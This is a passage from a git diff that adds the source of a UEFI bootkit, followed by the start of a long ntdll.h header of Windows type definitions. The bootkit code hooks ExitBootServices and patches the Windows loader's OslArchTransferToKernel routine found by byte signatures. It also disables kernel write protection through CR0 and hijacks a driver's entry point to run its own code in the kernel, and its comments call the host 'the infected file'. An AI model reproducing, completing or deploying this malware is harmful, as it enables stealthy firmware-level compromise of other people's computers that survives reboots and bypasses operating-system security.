Phy, Eft->KernelLen ); + + /* Get KernelMain() addr */ + Ofs = U_PTR( G_PTR( KmEnt ) ) - U_PTR( G_PTR( EfiMain ) ); + Fcn = C_PTR( U_PTR( Fcn ) + Ofs ); + + /* Execute KernelMain( KernelBase ); */ + ( ( VOID NTAPI ( * )( PVOID, PVOID ) ) Fcn )( Eft->KernelBase, Eft->TgtDrvImgBase ); + }; + /* Unmap the memory */ + Api.MmUnmapIoSpace( Phy, Eft->KernelLen ); + }; + + /* Force to 1 CPU */ + Api.KeSetSystemAffinityThread( 1 ); + + /* Remove write protection */ + __writecr0( __readcr0() &~ 0x000010000 ); + + /* Fix the section permissions */ + Sec->Characteristics &= IMAGE_SCN_MEM_EXECUTE; + + /* Fix the entrypoint */ + Ldr->EntryPoint = C_PTR( U_PTR( Dos ) + U_PTR( Eft->TgtDrvAddressOfEntrypoint ) ); + + /* Fix the image header */ + Nth->OptionalHeader.AddressOfEntryPoint = Eft->TgtDrvAddressOfEntrypoint; + + /* Insert write protection */ + __writecr0( __readcr0() | 0x000010000 ); + + /* Zero out stack structures */ + RtlSecureZeroMemory( &Api, sizeof( Api ) ); + + /* Execute original driver entrypoint */ + return ( ( __typeof__( DrvMain ) * ) C_PTR( U_PTR( Eft->TgtDrvImgBase ) + Eft->TgtDrvAddressOfEntrypoint ) )( + DriverObject, RegistryPath + ); +}; diff --git a/src/Bootkit/DrvMain.h b/src/Bootkit/DrvMain.h new file mode 100644 index 0000000..f4e3360 --- /dev/null +++ b/src/Bootkit/DrvMain.h @@ -0,0 +1,3 @@ +#pragma once + +D_SEC( G ) NTSTATUS NTAPI DrvMain( _In_ PVOID DriverObject, _In_ PVOID RegistryPath ); diff --git a/src/Bootkit/EfTbl.h b/src/Bootkit/EfTbl.h new file mode 100644 index 0000000..e9773ae --- /dev/null +++ b/src/Bootkit/EfTbl.h @@ -0,0 +1,17 @@ +#pragma once + +typedef struct __attribute__(( packed )) +{ + // ExitBootServicesHook / OslArchTransferToKernelHook + EFI_EXIT_BOOT_SERVICES ExitBootServices; + PVOID OslArchTransferToKernelGate; + + // DrvMain + PVOID KernelBuf; + ULONG KernelLen; + PVOID KernelBase; + PVOID TgtDrvImgSect; + PVOID TgtDrvImgBase; + PVOID TgtDrvLdrEntry; + ULONG TgtDrvAddressOfEntrypoint; +} EFTBL, *PEFTBL; diff --git a/src/Bootkit/EfiMain.c b/src/Bootkit/EfiMain.c new file mode 100644 index 0000000..6240dc6 --- /dev/null +++ b/src/Bootkit/EfiMain.c @@ -0,0 +1,68 @@ +#include "Common.h" + +D_SEC( A ) EFI_STATUS EFIAPI EfiMain( _In_ EFI_HANDLE ImageHandle, _In_ EFI_SYSTEM_TABLE * SystemTable ) +{ + SIZE_T Len = 0; + SIZE_T Pct = 0; + EFI_PHYSICAL_ADDRESS Epa = 0; + + PEFTBL Eft = NULL; + PCONFIG Cfg = NULL; + PIMAGE_DOS_HEADER Dos = NULL; + PIMAGE_NT_HEADERS Nth = NULL; + + /* Calculate the complete length of the current shellcode */ + Len = ( U_PTR( GetIp() ) + 11 ) - U_PTR( G_PTR( EfiMain ) ); + + /* Calculate the number of pages needed for the allocation */ + Pct = ( ( ( Len + 0x1000 - 1 ) &~ ( 0x1000 - 1 ) ) / 0x1000 ); + + /* Allocate the pages for the shellcode */ + if ( SystemTable->BootServices->AllocatePages( AllocateAnyPages, EfiRuntimeServicesData, Pct, &Epa ) == EFI_SUCCESS ) { + + /* Save a copy of the handler */ + Eft = C_PTR( G_PTR( EfTbl ) ); + Eft->ExitBootServices = C_PTR( SystemTable->BootServices->ExitBootServices ); + + /* Copy over the shellcode */ + __builtin_memcpy( C_PTR( Epa ), C_PTR( G_PTR( EfiMain ) ), Len ); + + /* Insert hooks into the handler */ + SystemTable->BootServices->ExitBootServices = C_PTR( U_PTR( Epa ) + ( G_PTR( ExitBootServicesHook ) - G_PTR( EfiMain ) ) ); + }; + + if ( ImageHandle != NULL ) { + /* Locate the 'Leave' symbol @ GetIp */ + Cfg = C_PTR( U_PTR( GetIp() ) + 11 ); + + /* Get the EfiMain symbol */ + Dos = C_PTR( G_PTR( EfiMain ) ); + Dos = C_PTR( U_PTR( U_PTR( Dos ) &~ ( 0x20 - 1 ) ) ); + + do + { + /* Has the MZ Stub? */ + if ( Dos->e_magic == IMAGE_DOS_SIGNATURE ) { + /* Patch the specified e_lfanew? */ + if ( Dos->e_lfanew == Cfg->AddressOfNewExeHeader ) { + /* Get a pointer to the NT header */ + Nth = C_PTR( U_PTR( Dos ) + Dos->e_lfanew ); + + /* Is our NT header? */ + if ( Nth->Signature == IMAGE_NT_SIGNATURE ) { + /* Yes! Abort! */ + break; + }; + }; + }; + /* Decrement */ + Dos = C_PTR( U_PTR( Dos ) - 0x20 ); + } while ( TRUE ); + + /* Execute EfiMain of the infected file */ + return ( ( __typeof__( EfiMain ) * ) C_PTR( U_PTR( Dos ) + Cfg->AddressOfEntrypoint ) )( + ImageHandle, SystemTable + ); + }; + return EFI_SUCCESS; +}; diff --git a/src/Bootkit/EfiMain.h b/src/Bootkit/EfiMain.h new file mode 100644 index 0000000..b00b9b2 --- /dev/null +++ b/src/Bootkit/EfiMain.h @@ -0,0 +1,3 @@ +#pragma once + +D_SEC( A ) EFI_STATUS EFIAPI EfiMain( _In_ EFI_HANDLE ImageHandle, _In_ EFI_SYSTEM_TABLE * SystemTable ); diff --git a/src/Bootkit/ExitBootServices.c b/src/Bootkit/ExitBootServices.c new file mode 100644 index 0000000..ce951db --- /dev/null +++ b/src/Bootkit/ExitBootServices.c @@ -0,0 +1,116 @@ +#include "Common.h" + +D_SEC( B ) EFI_STATUS EFIAPI ExitBootServicesHook( EFI_HANDLE ImageHandle, UINTN Key ) +{ + SIZE_T Osl = 0; + + PVOID Osp = NULL; + PEFTBL Eft = NULL; + PUINT8 Ptr = NULL; + PIMAGE_DOS_HEADER Dos = NULL; + PIMAGE_NT_HEADERS Nth = NULL; + PIMAGE_SECTION_HEADER Sec = NULL; + PIMAGE_DATA_DIRECTORY Dir = NULL; + PIMAGE_EXPORT_DIRECTORY Exp = NULL; + + /* Get pointer to EFI Table */ + Eft = C_PTR( G_PTR( EfTbl ) ); + + /* Find the return address and align it to the bottom of the page */ + Dos = C_PTR( __builtin_extract_return_addr( __builtin_return_address( 0 ) ) ); + Dos = C_PTR( U_PTR( U_PTR( Dos ) &~ ( 0x1000 - 1 ) ) ); + + do + { + /* Is this the MZ magic? */ + if ( Dos->e_magic == IMAGE_DOS_SIGNATURE ) { + if ( Dos->e_lfanew < 0x100 ) { + /* Get NT header */ + Nth = C_PTR( U_PTR( Dos ) + Dos->e_lfanew ); + + if ( Nth->Signature == IMAGE_NT_SIGNATURE ) { + /* Abort */ + break; + }; + }; + }; + /* Decrement */ + Dos = C_PTR( U_PTR( Dos ) - 0x1000 ); + } while ( TRUE ); + + /* Get pointer to the export table data directory */ + Dir = & Nth->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ]; + + if ( Dir->VirtualAddress ) { + /* Get pointer to the export address table */ + Exp = C_PTR( U_PTR( Dos ) + Dir->VirtualAddress ); + + /* Is our target boot services driver? */ + if ( HashString( C_PTR( U_PTR( Dos ) + Exp->Name ), 0 ) == 0x8deb5a3a || + HashString( C_PTR( U_PTR( Dos ) + Exp->Name ), 0 ) == 0x64255bfd || + HashString( C_PTR( U_PTR( Dos ) + Exp->Name ), 0 ) == 0x64259d80 ) + { + /* Get PE Section header */ + Sec = IMAGE_FIRST_SECTION( Nth ); + + /* Enumerate all PE Sections */ + for ( INT Idx = 0 ; Idx < Nth->FileHeader.NumberOfSections ; ++Idx ) { + /* Is this .text section? */ + if ( HashString( & Sec[ Idx ].Name, 0 ) == 0x0b6ea858 ) { + for ( INT Jdx = 0 ; Jdx < Sec[ Idx ].SizeOfRawData ; ++Jdx ) { + /* Get a pointer to the current instruction */ + Ptr = C_PTR( U_PTR( Dos ) + Sec[ Idx ].VirtualAddress + Jdx ); + + /* OslArchTransferToKernel Signature x1 */ + if ( Ptr[ 0x00 ] == 0x33 && Ptr[ 0x01 ] == 0xf6 && + Ptr[ 0x15 ] == 0x48 && Ptr[ 0x16 ] == 0x8d && Ptr[ 0x17 ] == 0x05 && + Ptr[ 0x1c ] == 0x48 && Ptr[ 0x1d ] == 0x8d && Ptr[ 0x1e ] == 0x0d && + Ptr[ 0x23 ] == 0x0f && Ptr[ 0x24 ] == 0x01 && Ptr[ 0x25 ] == 0x10 && + Ptr[ 0x26 ] == 0x0f && Ptr[ 0x27 ] == 0x01 && Ptr[ 0x28 ] == 0x19 ) + { + Osp = C_PTR( Ptr ); + Osl = 14; + break; + }; + + /* OslArchTransferToKernel Signature x2 */ + if ( Ptr[ 0x00 ] == 0x33 && Ptr[ 0x01 ] == 0xf6 && + Ptr[ 0x17 ] == 0x48 && Ptr[ 0x18 ] == 0x8d && Ptr[ 0x19 ] == 0x05 && + Ptr[ 0x1e ] == 0x48 && Ptr[ 0x1f ] == 0x8d && Ptr[ 0x20 ] == 0x0d && + Ptr[ 0x25 ] == 0x0f && Ptr[ 0x26 ] == 0x01 && Ptr[ 0x27 ] == 0x10 && + Ptr[ 0x28 ] == 0x0f && Ptr[ 0x29 ] == 0x01 && Ptr[ 0x2a ] == 0x19 ) + { + Osp = C_PTR( Ptr ); + Osl = 16; + break; + }; + + /* Note: Add x86 signatures here if you want x86 support */ + }; + /* .text is found */ + break; + }; + }; + /* Has the pointer to the function? */ + if ( Osp != NULL ) { + /* Copy over the callgate. */ + __builtin_memcpy( C_PTR( G_PTR( EfClg ) ), Osp, Osl ); + + /* Insert hook into OslArchTransferToKernel */ + *( PUINT16 )( C_PTR( U_PTR( Osp ) + 0x00 ) ) = ( UINT16 )( 0x25FF ); + *( PUINT32 )( C_PTR( U_PTR( Osp ) + 0x02 ) ) = ( UINT32 )( 0 ); + *( PUINT64 )( C_PTR( U_PTR( Osp ) + 0x06 ) ) = ( UINT64 )( C_PTR( G_PTR( OslArchTransferToKernelHook ) ) ); + + /* Insert jump callgate */ + *( PUINT16 )( C_PTR( U_PTR( G_PTR( EfClg ) ) + Osl + 0x00 ) ) = ( UINT16 )( 0x25FF ); + *( PUINT32 )( C_PTR( U_PTR( G_PTR( EfClg ) ) + Osl + 0x02 ) ) = ( UINT32 )( 0 ); + *( PUINT64 )( C_PTR( U_PTR( G_PTR( EfClg ) ) + Osl + 0x06 ) ) = ( UINT64 )( C_PTR( U_PTR( Osp ) + Osl ) ); + + /* Store the callgate address */ + Eft->OslArchTransferToKernelGate = C_PTR( G_PTR( EfClg ) ); + }; + }; + }; + /* Execute original function */ + return Eft->ExitBootServices( ImageHandle, Key ); +}; diff --git a/src/Bootkit/ExitBootServices.h b/src/Bootkit/ExitBootServices.h new file mode 100644 index 0000000..e28ccfd --- /dev/null +++ b/src/Bootkit/ExitBootServices.h @@ -0,0 +1,3 @@ +#pragma once + +D_SEC( B ) EFI_STATUS EFIAPI ExitBootServicesHook( EFI_HANDLE ImageHandle, UINTN Key ); diff --git a/src/Bootkit/Native.h b/src/Bootkit/Native.h new file mode 100644 index 0000000..9f3c76f --- /dev/null +++ b/src/Bootkit/Native.h @@ -0,0 +1,22439 @@ +/* + ntdll.h + User Mode, 32bit & 64bit version + Visual Studio 6.0 - Visual Studio 2010 and MingW compatible + Intel C++ Compiler (ICL) 11.x - 12.x prefered + + (c) 2019 - Rokas Kupstys + (c) 2009, 2010, 2011 - Fyyre + (c) 2011 - 2012 EP_X0FF + (c) 2011 - rndbit + + version 1.26 ( increment this if changes has global effect ) + please mark your changes date begin / date end comments + + last change 04/01/2012 + + note: Please use _M_X86/_M_X64 for if(n)def/endif conditionals, instead of WIN32/WIN64. +*/ + +#if !defined(_NTDLL_) +#define _NTDLL_ + +#pragma warning( disable:4001 ) // level 4 error - nonstandard extension 'single line comment' was used +#pragma warning( disable:4201 ) // level 4 error - nonstandard extension used : nameless struct/union - ANSI C violation +#pragma warning( disable:4214 ) // level 4 error - nonstandard extension used : bit field types other than int - ANSI C violation + +#if defined(__ICL) +#pragma warning ( disable : 344 ) +#endif + +#pragma pack( push, 8 ) + +#if defined(__cplusplus) +extern "C" { +#endif + +#include +#include + +#if !defined(NTSTATUS) +typedef LONG NTSTATUS; +typedef NTSTATUS *PNTSTATUS; +#endif + +#if !defined(SECURITY_STATUS) +typedef LONG SECURITY_STATUS; +#endif + +#define EXPORT_FN __declspec(dllexport) +#define IMPORT_FN __declspec(dllimport) + +#define PAGE_SIZE 0x1000 + +#define EXTERNAL extern "C" + +#ifndef UNREFERENCED_PARAMETER +#define UNREFERENCED_PARAMETER(P) (P) +#endif + +#include "ntstatus.h" + +#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0) +#define NT_INFORMATION(Status) ((ULONG)(Status) >> 30 == 1) +#define NT_WARNING(Status) ((ULONG)(Status) >> 30 == 2) +#define NT_ERROR(Status) ((ULONG)(Status) >> 30 == 3) + +#define ABSOLUTE_TIME(wait) (wait) +#define RELATIVE_TIME(wait) (-(wait)) +#define NANOSECONDS(nanos) \ + (((signed __int64)(nanos)) / 100L) +#define MICROSECONDS(micros) \ + (((signed __int64)(micros)) * NANOSECONDS(1000L)) +#define MILLISECONDS(milli) \ + (((signed __int64)(milli)) * MICROSECONDS(1000L)) +#define SECONDS(seconds) \ + (((signed __int64)(seconds)) * MILLISECONDS(1000L)) + +#define ARGUMENT_PRESENT(ArgumentPointer) (\ + (CHAR *)((ULONG_PTR)(ArgumentPointer)) != (CHAR *)(NULL) ) + +#define RESTORE_LIST(ListEntry) \ + ListEntry.Flink = ListEntry.Flink; \ + ListEntry.Blink = ListEntry.Blink + +#define UNLINK(x) (x).Blink->Flink = (x).Flink; \ + (x).Flink->Blink = (x).Blink; + +#define ALIGN_TO_POWER2( x, n ) (((ULONG)(x) + ((n)-1)) & ~((ULONG)(n)-1)) + +#define POI(addr) *(ULONG *)(addr) + +#define IS_PATH_SEPARATOR(ch) ((ch == '\\') || (ch == '/')) +#define IS_DOT(s) ( s[0] == '.' && ( IS_PATH_SEPARATOR(s[1]) || s[1] == '\0') ) +#define IS_DOT_DOT(s) ( s[0] == '.' && s[1] == '.' && ( IS_PATH_SEPARATOR(s[2]) || s[2] == '\0') ) + +#define IS_PATH_SEPARATOR_U(ch) ((ch == (WCHAR)'\\') || (ch == (WCHAR)'/')) +#define IS_DOT_U(s) ( s[0] == (WCHAR)'.' && ( IS_PATH_SEPARATOR_U(s[1]) || s[1] == UNICODE_NULL) ) +#define IS_DOT_DOT_U(s) ( s[0] == (WCHAR)'.' && s[1] == (WCHAR)'.' && ( IS_PATH_SEPARATOR_U(s[2]) || s[2] == UNICODE_NULL) ) + +#define jmp_length(y,x) ((x-y)-5) +#define stc_jc(y,x) ((x-y)-7) + +#define MODIFYBYTE( _base, _offset, _byte ) { ((unsigned char *)_base)[_offset] = (unsigned char)_byte; } +#define MODIFYWORD( _base, _offset, _word ) { ((unsigned short *)_base)[_offset] = (unsigned short)_word; } +#define MODIFYDWORD( _base, _offset, _dword ) { ((unsigned long *)_base)[_offset] = (unsigned long)_dword; } +#define MODIFYQWORD( _base, _offset, _qword ) { ((unsigned long long *)_base)[_offset] = (unsigned long long)_qword; } + +#define PTR_ADD_OFFSET(Pointer, Offset) ((PVOID)((ULONG_PTR)(Pointer) + (ULONG_PTR)(Offset))) + +#define WRITE_JMP( from, to ) { ((PCHAR)from)[0] = (CHAR)0xE9; *((ULONG_PTR *)&(((PCHAR)(from))[1])) = (PCHAR)(to) - (PCHAR)(from) - 5; } +#define GET_JMP( from ) (((PCHAR)from)[0]==(CHAR)0xE9)? (*((ULONG_PTR *)&(((PCHAR)(from))[1])) + 5 + (ULONG_PTR)(from)) : 0 + +#define ASSERT( exp ) ((void) 0) + +// +// The following macros store and retrieve USHORTS and ULONGS from potentially unaligned addresses, avoiding alignment faults. +// + +// 31.05.2011 - added the following macros +#define SHORT_SIZE (sizeof(USHORT)) +#define SHORT_MASK (SHORT_SIZE - 1) +#define LONG_SIZE (sizeof(LONG)) +#define LONG_MASK (LONG_SIZE - 1) +#define LOWBYTE_MASK 0x00FF + +#define FIRSTBYTE(VALUE) (VALUE & LOWBYTE_MASK) +#define SECONDBYTE(VALUE) ((VALUE >> 8) & LOWBYTE_MASK) +#define THIRDBYTE(VALUE) ((VALUE >> 16) & LOWBYTE_MASK) +#define FOURTHBYTE(VALUE) ((VALUE >> 24) & LOWBYTE_MASK) + +// +// if MIPS Big Endian, order of bytes is reversed. +// + +#define SHORT_LEAST_SIGNIFICANT_BIT 0 +#define SHORT_MOST_SIGNIFICANT_BIT 1 + +#define LONG_LEAST_SIGNIFICANT_BIT 0 +#define LONG_3RD_MOST_SIGNIFICANT_BIT 1 +#define LONG_2ND_MOST_SIGNIFICANT_BIT 2 +#define LONG_MOST_SIGNIFICANT_BIT 3 + +//++ +// +// VOID +// RtlStoreUshort ( +// PUSHORT ADDRESS +// USHORT VALUE +// ) +// +// Routine Description: +// +// This macro stores a USHORT value in at a particular address, avoiding +// alignment faults. +// +// Arguments: +// +// ADDRESS - where to store USHORT value +// VALUE - USHORT to store +// +// Return Value: +// +// none. +// +//-- + +#define RtlStoreUshort(ADDRESS,VALUE) \ + if ((ULONG_PTR)ADDRESS & SHORT_MASK) { \ + ((PUCHAR) ADDRESS)[SHORT_LEAST_SIGNIFICANT_BIT] = (UCHAR)(FIRSTBYTE(VALUE)); \ + ((PUCHAR) ADDRESS)[SHORT_MOST_SIGNIFICANT_BIT ] = (UCHAR)(SECONDBYTE(VALUE)); \ + } \ + else { \ + *((PUSHORT) ADDRESS) = (USHORT) VALUE; \ + } + + +//++ +// +// VOID +// RtlStoreUlong ( +// PULONG ADDRESS +// ULONG VALUE +// ) +// +// Routine Description: +// +// This macro stores a ULONG value in at a particular address, avoiding +// alignment faults. +// +// Arguments: +// +// ADDRESS - where to store ULONG value +// VALUE - ULONG to store +// +// Return Value: +// +// none. +// +// Note: +// Depending on the machine, we might want to call storeushort in the +// unaligned case. +// +//-- + +#define RtlStoreUlong(ADDRESS,VALUE) \ + if ((ULONG_PTR)ADDRESS & LONG_MASK) { \ + ((PUCHAR) ADDRESS)[LONG_LEAST_SIGNIFICANT_BIT ] = (UCHAR)(FIRSTBYTE(VALUE)); \ + ((PUCHAR) ADDRESS)[LONG_3RD_MOST_SIGNIFICANT_BIT ] = (UCHAR)(SECONDBYTE(VALUE)); \ + ((PUCHAR) ADDRESS)[LONG_2ND_MOST_SIGNIFICANT_BIT ] = (UCHAR)(THIRDBYTE(VALUE)); \ + ((PUCHAR) ADDRESS)[LONG_MOST_SIGNIFICANT_BIT ] = (UCHAR)(FOURTHBYTE(VALUE)); \ + } \ + else { \ + *((PULONG) ADDRESS) = (ULONG) VALUE; \ + } + +//++ +// +// VOID +// RtlRetrieveUshort ( +// PUSHORT DESTINATION_ADDRESS +// PUSHORT SOURCE_ADDRESS +// ) +// +// Routine Description: +// +// This macro retrieves a USHORT value from the SOURCE address, avoiding +// alignment faults. The DESTINATION address is assumed to be aligned. +// +// Arguments: +// +// DESTINATION_ADDRESS - where to store USHORT value +// SOURCE_ADDRESS - where to retrieve USHORT value from +// +// Return Value: +// +// none. +// +//-- + +#define RtlRetrieveUshort(DEST_ADDRESS,SRC_ADDRESS) \ + if ((ULONG_PTR)SRC_ADDRESS & SHORT_MASK) { \ + ((PUCHAR) DEST_ADDRESS)[0] = ((PUCHAR) SRC_ADDRESS)[0]; \ + ((PUCHAR) DEST_ADDRESS)[1] = ((PUCHAR) SRC_ADDRESS)[1]; \ + } \ + else { \ + *((PUSHORT) DEST_ADDRESS) = *((PUSHORT) SRC_ADDRESS); \ + } \ + +//++ +// +// VOID +// RtlRetrieveUlong ( +// PULONG DESTINATION_ADDRESS +// PULONG SOURCE_ADDRESS +// ) +// +// Routine Description: +// +// This macro retrieves a ULONG value from the SOURCE address, avoiding +// alignment faults. The DESTINATION address is assumed to be aligned. +// +// Arguments: +// +// DESTINATION_ADDRESS - where to store ULONG value +// SOURCE_ADDRESS - where to retrieve ULONG value from +// +// Return Value: +// +// none. +// +// Note: +// Depending on the machine, we might want to call retrieveushort in the +// unaligned case. +// +//-- + +#define RtlRetrieveUlong(DEST_ADDRESS,SRC_ADDRESS) \ + if ((ULONG_PTR)SRC_ADDRESS & LONG_MASK) { \ + ((PUCHAR) DEST_ADDRESS)[0] = ((PUCHAR) SRC_ADDRESS)[0]; \ + ((PUCHAR) DEST_ADDRESS)[1] = ((PUCHAR) SRC_ADDRESS)[1]; \ + ((PUCHAR) DEST_ADDRESS)[2] = ((PUCHAR) SRC_ADDRESS)[2]; \ + ((PUCHAR) DEST_ADDRESS)[3] = ((PUCHAR) SRC_ADDRESS)[3]; \ + } \ + else { \ + *((PULONG) DEST_ADDRESS) = *((PULONG) SRC_ADDRESS); \ + } + +//++ +// +// PCHAR +// RtlOffsetToPointer ( +// PVOID Base, +// ULONG Offset +// ) +// +// Routine Description: +// +// This macro generates a pointer which points to the byte that is 'Offset' +// bytes beyond 'Base'. This is useful for referencing fields within +// self-relative data structures. +// +// Arguments: +// +// Base - The address of the base of the structure. +// +// Offset - An unsigned integer offset of the byte whose address is to +// be generated. +// +// Return Value: +// +// A PCHAR pointer to the byte that is 'Offset' bytes beyond 'Base'. +// +// +//-- + +#define RtlOffsetToPointer(B,O) ((PCHAR)( ((PCHAR)(B)) + ((ULONG_PTR)(O)) )) + + +//++ +// +// ULONG +// RtlPointerToOffset ( +// PVOID Base, +// PVOID Pointer +// ) +// +// Routine Description: +// +// This macro calculates the offset from Base to Pointer. This is useful +// for producing self-relative offsets for structures. +// +// Arguments: +// +// Base - The address of the base of the structure. +// +// Pointer - A pointer to a field, presumably within the structure +// pointed to by Base. This value must be larger than that specified +// for Base. +// +// Return Value: +// +// A ULONG offset from Base to Pointer. +// +// +//-- + +#define RtlPointerToOffset(B,P) ((ULONG)( ((PCHAR)(P)) - ((PCHAR)(B)) )) +// 31.05.2011 - end + +// +// Data Types -- DOT NOT modify -- modification will break 32bit & 64bit compatibly. +// + +typedef char CCHAR; +typedef short CSHORT; +typedef CCHAR *PCCHAR; +typedef CSHORT *PCSHORT; +typedef ULONG CLONG; +typedef ULONG *PCLONG; + +typedef ULONG LOGICAL; +typedef ULONG *PLOGICAL; + +typedef LONG KPRIORITY; + +typedef struct _STRING +{ + USHORT Length; + USHORT MaximumLength; + PCHAR Buffer; +} STRING; +typedef STRING *PSTRING; + +typedef STRING ANSI_STRING; +typedef PSTRING PANSI_STRING; + +typedef STRING OEM_STRING; +typedef PSTRING POEM_STRING; +typedef CONST STRING* PCOEM_STRING; + +typedef struct _CSTRING +{ + USHORT Length; + USHORT MaximumLength; + CONST char *Buffer; +} CSTRING; +typedef CSTRING *PCSTRING; +#define ANSI_NULL ((CHAR)0) + +typedef STRING CANSI_STRING; +typedef PSTRING PCANSI_STRING; + +typedef struct _UNICODE_STRING +{ + USHORT Length; + USHORT MaximumLength; + PWSTR Buffer; +} UNICODE_STRING, *PUNICODE_STRING, **PPUNICODE_STRING; +typedef const UNICODE_STRING *PCUNICODE_STRING; + +typedef struct _STRING32 +{ + USHORT Length; + USHORT MaximumLength; + ULONG Buffer; +} STRING32; +typedef STRING32 *PSTRING32; + +typedef STRING32 UNICODE_STRING32; +typedef UNICODE_STRING32 *PUNICODE_STRING32; +#define UNICODE_NULL ((WCHAR)0) + +typedef STRING32 ANSI_STRING32; +typedef ANSI_STRING32 *PANSI_STRING32; + +typedef struct _STRING64 +{ + USHORT Length; + USHORT MaximumLength; + ULONG_PTR Buffer; +} STRING64; + +typedef STRING64 *PSTRING64; + +typedef STRING64 UNICODE_STRING64; +typedef UNICODE_STRING64 *PUNICODE_STRING64; + +typedef STRING64 ANSI_STRING64; +typedef ANSI_STRING64 *PANSI_STRING64; + +typedef USHORT RTL_ATOM; +typedef RTL_ATOM *PRTL_ATOM; + +typedef UCHAR KIRQL; +typedef KIRQL *PKIRQL; + +typedef CONST char *PCSZ; + +typedef LARGE_INTEGER PHYSICAL_ADDRESS, *PPHYSICAL_ADDRESS; + +#if !defined( _WINNT_ ) + +typedef struct _LIST_ENTRY { + struct _LIST_ENTRY *Flink; + struct _LIST_ENTRY *Blink; +} LIST_ENTRY, *PLIST_ENTRY, *RESTRICTED_POINTER PRLIST_ENTRY; + +#define FIELD_OFFSET(type, field) ((LONG)&(((type *)0)->field)) + +#define CONTAINING_RECORD(address, type, field) ((type FAR *)( \ + (PCHAR)(address) - \ + (PCHAR)(&((type *)0)->field))) +#endif + +typedef struct _TRIPLE_LIST_ENTRY +{ + struct _TRIPLE_LIST_ENTRY* Flink[ 3 ]; + struct _TRIPLE_LIST_ENTRY* Blink; +} TRIPLE_LIST_ENTRY, *PTRIPLE_LIST_ENTRY; + +#define IN_REGION(x, Base, Size) (((ULONG)x >= (ULONG_PTR)Base) && ((ULONG)x <= (ULONG_PTR)Base + (ULONG)Size)) + +#ifndef RVATOVA +#define RVATOVA(base, offset) ((PVOID)((ULONG)base + (ULONG)(offset))) +#endif + +#ifndef NOP_FUNCTION +#define NOP_FUNCTION (void)0 +#endif +#define PAGED_CODE() NOP_FUNCTION; + +#if defined(USE_LPC6432) +#define LPC_CLIENT_ID CLIENT_ID64 +#define LPC_SIZE_T ULONGLONG +#define LPC_PVOID ULONGLONG +#define LPC_HANDLE ULONGLONG +#else +#define LPC_CLIENT_ID CLIENT_ID +#define LPC_SIZE_T SIZE_T +#define LPC_PVOID PVOID +#define LPC_HANDLE HANDLE +#endif + +#define OBJ_INHERIT 0x00000002L +#define OBJ_HANDLE_TAGBITS 0x00000003L +#define OBJ_PERMANENT 0x00000010L +#define OBJ_EXCLUSIVE 0x00000020L +#define OBJ_CASE_INSENSITIVE 0x00000040L +#define OBJ_OPENIF 0x00000080L +#define OBJ_OPENLINK 0x00000100L +#define OBJ_KERNEL_HANDLE 0x00000200L +#define OBJ_FORCE_ACCESS_CHECK 0x00000400L +#define OBJ_VALID_ATTRIBUTES 0x000007F2L + +#define RTL_QUERY_PROCESS_MODULES 0x00000001 +#define RTL_QUERY_PROCESS_BACKTRACES 0x00000002 +#define RTL_QUERY_PROCESS_HEAP_SUMMARY 0x00000004 +#define RTL_QUERY_PROCESS_HEAP_TAGS 0x00000008 +#define RTL_QUERY_PROCESS_HEAP_ENTRIES 0x00000010 +#define RTL_QUERY_PROCESS_LOCKS 0x00000020 +#define RTL_QUERY_PROCESS_MODULES32 0x00000040 +#define RTL_QUERY_PROCESS_NONINVASIVE 0x80000000 + +typedef struct _OBJECT_ATTRIBUTES +{ + ULONG Length; + HANDLE RootDirectory; + PUNICODE_STRING ObjectName; + ULONG Attributes; + PVOID SecurityDescriptor; // SECURITY_DESCRIPTOR + PVOID SecurityQualityOfService; // SECURITY_QUALITY_OF_SERVICE +} OBJECT_ATTRIBUTES; +typedef OBJECT_ATTRIBUTES *POBJECT_ATTRIBUTES; +typedef CONST OBJECT_ATTRIBUTES *PCOBJECT_ATTRIBUTES; + +#define InitializeObjectAttributes( p, n, a, r, s ) { \ + (p)->Length = sizeof( OBJECT_ATTRIBUTES ); \ + (p)->RootDirectory = r; \ + (p)->Attributes = a; \ + (p)->ObjectName = n; \ + (p)->SecurityDescriptor = s; \ + (p)->SecurityQualityOfService = NULL; \ +} + +//added 20.12.11 +typedef struct _OBJECT_DIRECTORY_INFORMATION { + UNICODE_STRING Name; + UNICODE_STRING TypeName; +} OBJECT_DIRECTORY_INFORMATION, *POBJECT_DIRECTORY_INFORMATION; + +#if defined(_WINNT_) && (_MSC_VER < 1300) && !defined(___PROCESSOR_NUMBER_DEFINED) +#define ___PROCESSOR_NUMBER_DEFINED +typedef struct _PROCESSOR_NUMBER { + WORD Group; + BYTE Number; + BYTE Reserved; +} PROCESSOR_NUMBER, *PPROCESSOR_NUMBER; +#endif + +#if _WIN32_WINNT >= 0x0501 + +#define ANSI_NULL ((CHAR)0) +#define UNICODE_NULL ((WCHAR)0) + +#ifndef UNICODE_STRING_MAX_BYTES +#define UNICODE_STRING_MAX_BYTES ((USHORT) 65534) +#endif + +#define UNICODE_STRING_MAX_CHARS (32767) + +#define DECLARE_CONST_UNICODE_STRING(_variablename, _string) \ + const WCHAR _variablename ## _buffer[] = _string; \ + const UNICODE_STRING _variablename = { sizeof(_string) - sizeof(WCHAR), sizeof(_string), (PWSTR) _variablename ## _buffer }; + +#endif // _WIN32_WINNT >= 0x0501 + +#define IsListEmpty(ListHead) \ + ((ListHead)->Flink == (ListHead)) + +#define InitializeListHead(ListHead) (\ + (ListHead)->Flink = (ListHead)->Blink = (ListHead)) + +#define IsListEmpty(ListHead) \ + ((ListHead)->Flink == (ListHead)) + +#define RemoveHeadList(ListHead) \ + (ListHead)->Flink;\ + {RemoveEntryList((ListHead)->Flink)} + +#define RemoveTailList(ListHead) \ + (ListHead)->Blink;\ + {RemoveEntryList((ListHead)->Blink)} + +// VOID +// RemoveEntryList( +// IN PLIST_ENTRY Entry +// ); +#define RemoveEntryList(Entry) {\ + PLIST_ENTRY _EX_Blink;\ + PLIST_ENTRY _EX_Flink;\ + _EX_Flink = (Entry)->Flink;\ + _EX_Blink = (Entry)->Blink;\ + _EX_Blink->Flink = _EX_Flink;\ + _EX_Flink->Blink = _EX_Blink;\ + } + + +// VOID +// InsertTailList( +// IN PLIST_ENTRY ListHead, +// IN PLIST_ENTRY Entry +// ); +#define InsertTailList(ListHead,Entry) {\ + PLIST_ENTRY _EX_Blink;\ + PLIST_ENTRY _EX_ListHead;\ + _EX_ListHead = (ListHead);\ + _EX_Blink = _EX_ListHead->Blink;\ + (Entry)->Flink = _EX_ListHead;\ + (Entry)->Blink = 